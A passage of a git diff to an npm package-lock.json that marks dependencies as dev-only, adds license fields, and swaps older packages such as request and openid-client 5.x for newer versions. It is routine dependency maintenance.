"sha512-8TNmfeTCk2Le33A3vRRwtuworG/L5RrgMvdjhKZxvyShO+mBu2fP50OWUjRLNtvw344DdDarFh9buFAZs5ujeA==", "dev": true, + "license": "MIT", "dependencies": { - "assert-plus": "1.0.0", - "extsprintf": "1.3.0", - "json-schema": "0.4.0", - "verror": "1.10.0" + "@jsep-plugin/assignment": "^1.3.0", + "@jsep-plugin/regex": "^1.0.4", + "jsep": "^1.4.0" + }, + "bin": { + "jsonpath": "bin/jsonpath-cli.js", + "jsonpath-plus": "bin/jsonpath-cli.js" }, "engines": { - "node": ">=0.6.0" + "node": ">=18.0.0" } }, "node_modules/kleur": { "version": "3.0.3", "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", + "dev": true, "engines": { "node": ">=6" } @@ -2842,6 +3121,7 @@ "version": "3.1.0", "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", + "dev": true, "engines": { "node": ">=6" } @@ -2849,12 +3129,14 @@ "node_modules/lines-and-columns": { "version": "1.2.4", "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==" + "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", + "dev": true }, "node_modules/locate-path": { "version": "5.0.0", "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", + "dev": true, "dependencies": { "p-locate": "^4.1.0" }, @@ -2865,12 +3147,14 @@ "node_modules/lodash.memoize": { "version": "4.1.2", "resolved": "https://registry.npmjs.org/lodash.memoize/-/lodash.memoize-4.1.2.tgz", - "integrity": "sha512-t7j+NzmgnQzTAYXcsHYLgimltOV1MXHtlOWf6GjL9Kj8GK5FInw5JotxvbOs+IvV1/Dzo04/fCGfLVs7aXb4Ag==" + "integrity": "sha512-t7j+NzmgnQzTAYXcsHYLgimltOV1MXHtlOWf6GjL9Kj8GK5FInw5JotxvbOs+IvV1/Dzo04/fCGfLVs7aXb4Ag==", + "dev": true }, "node_modules/lru-cache": { "version": "5.1.1", "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", + "dev": true, "dependencies": { "yallist": "^3.0.2" } @@ -2879,6 +3163,7 @@ "version": "4.0.0", "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-4.0.0.tgz", "integrity": "sha512-hXdUTZYIVOt1Ex//jAQi+wTZZpUpwBj/0QsOzqegb3rGMMeJiSEu5xLHnYfBrRV4RH2+OCSOO95Is/7x1WJ4bw==", + "dev": true, "dependencies": { "semver": "^7.5.3" }, @@ -2893,6 +3178,7 @@ "version": "7.6.3", "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", + "dev": true, "bin": { "semver": "bin/semver.js" }, @@ -2903,25 +3189,39 @@ "node_modules/make-error": { "version": "1.3.6", "resolved": "https://registry.npmjs.org/make-error/-/make-error-1.3.6.tgz", - "integrity": "sha512-s8UhlNe7vPKomQhC1qFelMokr/Sc3AgNbso3n74mVPA5LTZwkB9NlXf4XPamLxJE8h0gh73rM94xvwRT2CVInw==" + "integrity": "sha512-s8UhlNe7vPKomQhC1qFelMokr/Sc3AgNbso3n74mVPA5LTZwkB9NlXf4XPamLxJE8h0gh73rM94xvwRT2CVInw==", + "dev": true }, "node_modules/makeerror": { "version": "1.0.12", "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", + "dev": true, "dependencies": { "tmpl": "1.0.5" } }, + "node_modules/math-intrinsics": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/math-intrinsics/-/math-intrinsics-1.1.0.tgz", + "integrity": "sha512-/IXtbwEk5HTPyEwyKX6hGkYXxM9nbj64B+ilVJnC/R6B0pH5G4V3b0pVbL7DBj4tkhBAppbQUlf6F6Xl9LHu1g==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 0.4" + } + }, "node_modules/merge-stream": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==" + "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", + "dev": true }, "node_modules/micromatch": { "version": "4.0.8", "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.8.tgz", "integrity": "sha512-PXwfBhYu0hBCPw8Dn0E+WDYb7af3dSLVWKi3HGv84IdF4TyFoC0ysxFd0Goxw7nSv4T/PzEJQxsYsEiFCKo2BA==", + "dev": true, "dependencies": { "braces": "^3.0.3", "picomatch": "^2.3.1" @@ -2935,6 +3235,7 @@ "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==", "dev": true, + "license": "MIT", "engines": { "node": ">= 0.6" } @@ -2944,6 +3245,7 @@ "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", "dev": true, + "license": "MIT", "dependencies": { "mime-db": "1.52.0" }, @@ -2955,6 +3257,7 @@ "version": "2.1.0", "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", + "dev": true, "engines": { "node": ">=6" } @@ -2963,6 +3266,7 @@ "version": "3.1.2", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", + "dev": true, "dependencies": { "brace-expansion": "^1.1.7" }, @@ -2970,82 +3274,56 @@ "node": "*" } }, - "node_modules/minipass": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-5.0.0.tgz", - "integrity": "sha512-3FnjYuehv9k6ovOEbyOswadCDPX1piCfhV8ncmYtHOjuPwylVWsghTLo7rabjC3Rx5xD4HDx8Wm1xnMF7S5qFQ==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/minizlib": { + "node_modules/ms": { "version": "2.1.2", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-2.1.2.tgz", - "integrity": "sha512-bAxsR8BVfj60DWXHE3u30oHzfl4G7khkSuPW+qvpd7jFRHm7dLxOjUk1EHACJ/hxLY8phGJ0YhYHZo7jil7Qdg==", - "dev": true, - "dependencies": { - "minipass": "^3.0.0", - "yallist": "^4.0.0" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/minizlib/node_modules/minipass": { - "version": "3.3.6", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-3.3.6.tgz", - "integrity": "sha512-DxiNidxSEK+tHG6zOIklvNOwm3hvCrbUrdtzY74U6HKTJxvIDfOUL5W5P2Ghd3DTkhhKPYGqeNUIh5qcM4YBfw==", - "dev": true, - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=8" - } + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", + "dev": true }, - "node_modules/minizlib/node_modules/yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", + "node_modules/natural-compare": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", + "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", "dev": true }, - "node_modules/mkdirp": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-1.0.4.tgz", - "integrity": "sha512-vVqVZQyf3WLx2Shd0qJ9xuvqgAyKPLAiqITEtqW0oIUjzo3PePDd6fW9iFz30ef7Ysp/oiWqbhszeGWW2T6Gzw==", + "node_modules/node-fetch": { + "version": "2.7.0", + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", + "integrity": "sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", "dev": true, - "bin": { - "mkdirp": "bin/cmd.js" + "license": "MIT", + "dependencies": { + "whatwg-url": "^5.0.0" }, "engines": { - "node": ">=10" + "node": "4.x || >=6.0.0" + }, + "peerDependencies": { + "encoding": "^0.1.0" + }, + "peerDependenciesMeta": { + "encoding": { + "optional": true + } } }, - "node_modules/ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==" - }, - "node_modules/natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==" - }, "node_modules/node-int64": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==" + "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", + "dev": true }, "node_modules/node-releases": { "version": "2.0.18", "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.18.tgz", - "integrity": "sha512-d9VeXT4SJ7ZeOqGX6R5EM022wpL+eWPooLI+5UpWn2jCT1aosUQEhQP214x33Wkwx3JQMvIm+tIoVOdodFS40g==" + "integrity": "sha512-d9VeXT4SJ7ZeOqGX6R5EM022wpL+eWPooLI+5UpWn2jCT1aosUQEhQP214x33Wkwx3JQMvIm+tIoVOdodFS40g==", + "dev": true }, "node_modules/normalize-path": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", + "dev": true, "engines": { "node": ">=0.10.0" } @@ -3054,6 +3332,7 @@ "version": "4.0.1", "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", + "dev": true, "dependencies": { "path-key": "^3.0.0" }, @@ -3061,39 +3340,21 @@ "node": ">=8" } }, - "node_modules/oauth-sign": { - "version": "0.9.0", - "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", - "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", - "dev": true, - "engines": { - "node": "*" - } - }, - "node_modules/object-hash": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/object-hash/-/object-hash-2.2.0.tgz", - "integrity": "sha512-gScRMn0bS5fH+IuwyIFgnh9zBdo4DV+6GhygmWM9HyNJSgS0hScp1f5vjtm7oIIOiT9trXrShAkLFSc2IqKNgw==", - "dev": true, - "optional": true, - "engines": { - "node": ">= 6" - } - }, - "node_modules/oidc-token-hash": { - "version": "5.0.3", - "resolved": "https://registry.npmjs.org/oidc-token-hash/-/oidc-token-hash-5.0.3.tgz", - "integrity": "sha512-IF4PcGgzAr6XXSff26Sk/+P4KZFJVuHAJZj3wgO3vX2bMdNVp/QXTP3P7CEm9V1IdG8lDLY3HhiqpsE/nOwpPw==", + "node_modules/oauth4webapi": { + "version": "3.5.3", + "resolved": "https://registry.npmjs.org/oauth4webapi/-/oauth4webapi-3.5.3.tgz", + "integrity": "sha512-2bnHosmBLAQpXNBLOvaJMyMkr4Yya5ohE5Q9jqyxiN+aa7GFCzvDN1RRRMrp0NkfqRR2MTaQNkcSUCCjILD9oQ==", "dev": true, - "optional": true, - "engines": { - "node": "^10.13.0 || >=12.0.0" + "license": "MIT", + "funding": { + "url": "https://github.com/sponsors/panva" } }, "node_modules/once": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", + "dev": true, "dependencies": { "wrappy": "1" } @@ -3102,6 +3363,7 @@ "version": "5.1.2", "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", + "dev": true, "dependencies": { "mimic-fn": "^2.1.0" }, @@ -3113,45 +3375,24 @@ } }, "node_modules/openid-client": { - "version": "5.4.3", - "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-5.4.3.tgz", - "integrity": "sha512-sVQOvjsT/sbSfYsQI/9liWQGVZH/Pp3rrtlGEwgk/bbHfrUDZ24DN57lAagIwFtuEu+FM9Ev7r85s8S/yPjimQ==", + "version": "6.6.1", + "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-6.6.1.tgz", + "integrity": "sha512-GmqoICGMI3IyFFjhvXxad8of4QWk2D0tm4vdJkldGm9nw7J3p1f7LPLWgGeFuKuw8HjDVe8Dd8QLGBe0NFvSSg==", "dev": true, - "optional": true, + "license": "MIT", "dependencies": { - "jose": "^4.14.4", - "lru-cache": "^6.0.0", - "object-hash": "^2.2.0", - "oidc-token-hash": "^5.0.3" + "jose": "^6.0.11", + "oauth4webapi": "^3.5.3" }, "funding": { "url": "https://github.com/sponsors/panva" } }, - "node_modules/openid-client/node_modules/lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, - "optional": true, - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/openid-client/node_modules/yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true, - "optional": true - }, "node_modules/p-limit": { "version": "3.1.0", "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", + "dev": true, "dependencies": { "yocto-queue": "^0.1.0" }, @@ -3166,6 +3407,7 @@ "version": "4.1.0", "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", + "dev": true, "dependencies": { "p-limit": "^2.2.0" }, @@ -3177,6 +3419,7 @@ "version": "2.3.0", "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", + "dev": true, "dependencies": { "p-try": "^2.0.0" }, @@ -3191,6 +3434,7 @@ "version": "2.2.0", "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", + "dev": true, "engines": { "node": ">=6" } @@ -3199,6 +3443,7 @@ "version": "5.2.0", "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", + "dev": true, "dependencies": { "@babel/code-frame": "^7.0.0", "error-ex": "^1.3.1", @@ -3216,6 +3461,7 @@ "version": "4.0.0", "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", + "dev": true, "engines": { "node": ">=8" } @@ -3224,6 +3470,7 @@ "version": "1.0.1", "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", + "dev": true, "engines": { "node": ">=0.10.0" } @@ -3232,6 +3479,7 @@ "version": "3.1.1", "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", + "dev": true, "engines": { "node": ">=8" } @@ -3239,23 +3487,20 @@ "node_modules/path-parse": { "version": "1.0.7", "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==" - }, - "node_modules/performance-now": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", - "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==", + "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", "dev": true }, "node_modules/picocolors": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz", - "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==" + "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==", + "dev": true }, "node_modules/picomatch": { "version": "2.3.1", "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", + "dev": true, "engines": { "node": ">=8.6" }, @@ -3267,6 +3512,7 @@ "version": "4.0.6", "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", + "dev": true, "engines": { "node": ">= 6" } @@ -3275,6 +3521,7 @@ "version": "4.2.0", "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", + "dev": true, "dependencies": { "find-up": "^4.0.0" }, @@ -3283,10 +3530,11 @@ } }, "node_modules/prettier": { - "version": "3.4.2", - "resolved": "https://registry.npmjs.org/prettier/-/prettier-3.4.2.tgz", - "integrity": "sha512-e9MewbtFo+Fevyuxn/4rrcDAaq0IYxPGLvObpQjiZBMAzB9IGmzlnG9RZy3FFas+eBMu2vA0CszMeduow5dIuQ==", + "version": "3.6.0", + "resolved": "https://registry.npmjs.org/prettier/-/prettier-3.6.0.tgz", + "integrity": "sha512-ujSB9uXHJKzM/2GBuE0hBOUgC77CN3Bnpqa+g80bkv3T3A93wL/xlzDATHhnhkzifz/UE2SNOvmbTz5hSkDlHw==", "dev": true, + "license": "MIT", "bin": { "prettier": "bin/prettier.cjs" }, @@ -3301,6 +3549,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.7.0.tgz", "integrity": "sha512-Pdlw/oPxN+aXdmM9R00JVC9WVFoCLTKJvDVLgmJ+qAffBMxsV85l/Lu7sNx4zSzPyoL2euImuEwHhOXdEgNFZQ==", + "dev": true, "dependencies": { "@jest/schemas": "^29.6.3", "ansi-styles": "^5.0.0", @@ -3314,6 +3563,7 @@ "version": "5.2.0", "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", + "dev": true, "engines": { "node": ">=10" }, @@ -3325,6 +3575,7 @@ "version": "2.4.2", "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", + "dev": true, "dependencies": { "kleur": "^3.0.3", "sisteransi": "^1.0.5" @@ -3333,25 +3584,22 @@ "node": ">= 6" } }, - "node_modules/psl": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", - "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==", - "dev": true - }, - "node_modules/punycode": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.0.tgz", - "integrity": "sha512-rRV+zQD8tVFys26lAGR9WUuS4iUAngJScM+ZRSKtvl5tKeZ2t5bvdNFdNHBW9FWR4guGHlgmsZ1G7BSm2wTbuA==", + "node_modules/pump": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/pump/-/pump-3.0.3.tgz", + "integrity": "sha512-todwxLMY7/heScKmntwQG8CXVkWUOdYxIvY2s0VWAAMh/nd8SoYiRaKjlr7+iCs984f2P8zvrfWcDDYVb73NfA==", "dev": true, - "engines": { - "node": ">=6" + "license": "MIT", + "dependencies": { + "end-of-stream": "^1.1.0", + "once": "^1.3.1" } }, "node_modules/pure-rand": { "version": "6.1.0", "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.1.0.tgz", "integrity": "sha512-bVWawvoZoBYpp6yIoQtQXHZjmz35RSVHnUOTefl8Vcjr8snTPY1wnpSPMWekcFwbxI6gtmT7rSYPFvz71ldiOA==", + "dev": true, "funding": [ { "type": "individual", @@ -3363,70 +3611,17 @@ } ] }, - "node_modules/qs": { - "version": "6.5.3", - "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", - "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", - "dev": true, - "engines": { - "node": ">=0.6" - } - }, "node_modules/react-is": { "version": "18.2.0", "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==" - }, - "node_modules/request": { - "version": "2.88.2", - "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", - "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", - "deprecated": "request has been deprecated, see https://github.com/request/request/issues/3142", - "dev": true, - "dependencies": { - "aws-sign2": "~0.7.0", - "aws4": "^1.8.0", - "caseless": "~0.12.0", - "combined-stream": "~1.0.6", - "extend": "~3.0.2", - "forever-agent": "~0.6.1", - "form-data": "~2.3.2", - "har-validator": "~5.1.3", - "http-signature": "~1.2.0", - "is-typedarray": "~1.0.0", - "isstream": "~0.1.2", - "json-stringify-safe": "~5.0.1", - "mime-types": "~2.1.19", - "oauth-sign": "~0.9.0", - "performance-now": "^2.1.0", - "qs": "~6.5.2", - "safe-buffer": "^5.1.2", - "tough-cookie": "~2.5.0", - "tunnel-agent": "^0.6.0", - "uuid": "^3.3.2" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/request/node_modules/form-data": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", - "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", - "dev": true, - "dependencies": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - }, - "engines": { - "node": ">= 0.12" - } + "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", + "dev": true }, "node_modules/require-directory": { "version": "2.1.1", "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", + "dev": true, "engines": { "node": ">=0.10.0" } @@ -3435,6 +3630,7 @@ "version": "1.22.8", "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", + "dev": true, "dependencies": { "is-core-module": "^2.13.0", "path-parse": "^1.0.7", @@ -3451,6 +3647,7 @@ "version": "3.0.0", "resolved": 